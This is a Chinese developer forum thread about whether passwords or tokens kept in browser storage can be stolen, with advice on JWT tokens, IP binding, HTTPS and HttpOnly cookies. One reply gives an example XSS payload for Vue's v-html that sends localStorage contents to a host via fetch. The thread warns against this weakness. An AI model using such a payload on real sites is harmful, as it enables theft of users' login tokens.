如何破解前端保存的用户密码？

掩耳盗铃...

你怎么解密他就怎么解密，所以你为什么要把密码存在本地

hashids 放前端用？

建议上 OIDC

为什么要破解，我把你加密的密码存到我的 locaostorage 不就行了

1.攻击者要找到脚本漏洞使用 xss 攻击方式获取用户密码
2.应该保存 token 登陆，而不是密码明文。

@renmu 那你就理解成 jwt 吧，目的是免登录

@wunonglin 前后端都可以用吧，没在前端用过，理论上前端是透明的 道理我懂，只是一个不成熟的想法，想问问行不行得通，不行就算了。

@yaott2020 就是用的 jwt ，现在在思考前端如何保存 token ， 总不能每次都登录一下吧。

@DoveAz 感谢提醒， 一下子没想到这个。

@okakuyang 我以为 token 和密码是一样的，怎么保存密码就怎么保存 token ，密码怎么泄漏的，token 就怎么泄漏，泄漏 token ，攻击者就能以你的身份进行操作了。。

@renmu @wunonglin @yaott2020 @DoveAz @okakuyang

思考了一下，前端也不搞花里胡哨了，直接明文存 token ，后台对 token 和 IP +mac 绑定，校验 token 的同时校验 ip 和 mac ，如果不一致则校验失败，这样做还有风险么？？

@yjim 你这样保障安全性局限太大了吧

@yjim 那估计动不动就要重新登陆了

@yaott2020 比如？


@okakuyang 就我了解到的，现在的网络供应商一般都是 48 小时才重置一次 IP 吧，然后我这服务不是面向公众的，用户基本上都是在稳定的设备上登录使用，不至于动不动就要重新登录吧。

然后校验 ip 和 mac 只是一个思路 /方向。

只要明文传输,fiddler 抓一下就能看到,甚至都不需要知道他怎么加密的

@a33291 请求必然是 https 的

我就没搞懂，你前面搞这么复杂，后端请求难道不验证了吗？如果验证携带什么？如果不验证就类似开放的系统，破了其他用户密码有毛用？

MAC 怎么拿的？？

如果部分地方用了 v-html 渲染用户输入的内容 ，则可能被通过 XSS 攻击的方式获取到密码，例如：

<div v-html="content"></div>
content:'<img src="" onerror="fetch(`http://127.0.0.1/${JSON.stringify(localStorage)}`)" />'

@rabbbit vue 安全页面里有强调过这个，v-html 能不用就不用，用的话要对能容进行 xssfilter

想要安全就用 cookies ，然后设置 Secure 和 HttpOnly

@Senorsen 只是一个思路，不一定非要是 mac ，像一些大厂，你异地登录就能识别出来，然后要求手机验证，总有办法进行识别的。我原先想着在前端做一些保护，比如加密存储 token ，不过看起来前端是彻底暴露的，所以重点还是要在后端做好防护才行。

@rabbbit 感谢提醒，我去了解下这个